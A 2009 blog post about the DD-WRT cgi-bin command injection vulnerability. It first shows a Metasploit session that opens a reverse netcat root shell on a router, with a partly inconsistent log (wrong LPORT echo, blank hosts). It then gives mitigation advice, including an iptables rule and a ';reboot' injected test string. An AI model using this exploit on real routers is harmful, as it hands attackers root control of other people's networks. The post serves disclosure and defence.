Sunday, 26 July 2009

Expoliting the cgi-bin vulnerability in dd-wrt

Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. In this example we are attacking from the LAN side of a Linksys WRT54GS running dd-wrt V24-SP1 using factory default settings.

msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST
msf exploit(ddwrt_cgibin_exec) > set LHOST
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened ( ->
uname -a
Linux DD-WRTx86CI #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown

DD-WRT httpd vulnerability

As reported at there is a vulnerability in the http-server for the DD-WRT management GUI that can be used for execution of an exploit to gain control over the router.

Note: The exploit can only be used directly from outside your network over the internet if you have enabled remote Web GUI management in the Administration tab. As immediate action please disable the remote Web GUI management. But that limitation could be easily overridden by a Cross-Site Request Forgery (CSFR) where a malicious website could inject the exploit from inside the browser.

They guys over at dd-wrt have fixed the issue and generated new builds of the latest DD-WRT version. You can temporarily download the these files from here until we did update the router database.
[UPDATE] The guys over at dd-wrt have integrated most of the fixed build files into the router database. You can check there if files for build 12533 are available for your router. If not (yet) please check the location mentioned above to obtain the files.

The exploit can also be stopped, using a firewall rule: Go to your router's admin interface to > Administration > Commands and enter the following text:insmod ipt_webstr
ln -s /dev/null /tmp/exec.tmp
iptables -D INPUT -p tcp -m tcp -m webstr --url cgi-bin -j REJECT --reject-with tcp-reset
iptables -I INPUT -p tcp -m tcp -m webstr --url cgi-bin -j REJECT --reject-with tcp-reset
press "Save Firewall" and reboot your router. This rule blocks any attempt to access sth that has "cgi-bin" in the url. You can verify that the rule is working by entering:;reboot in your browser. That should give a "Connection was reset" (Firefox).

Important Note: This only works for non-https requests. if you have HTTPS Management turned on under > Administration > Management > Remote Access, then turn it off. If you don't want to turn it off, you only can do an Update.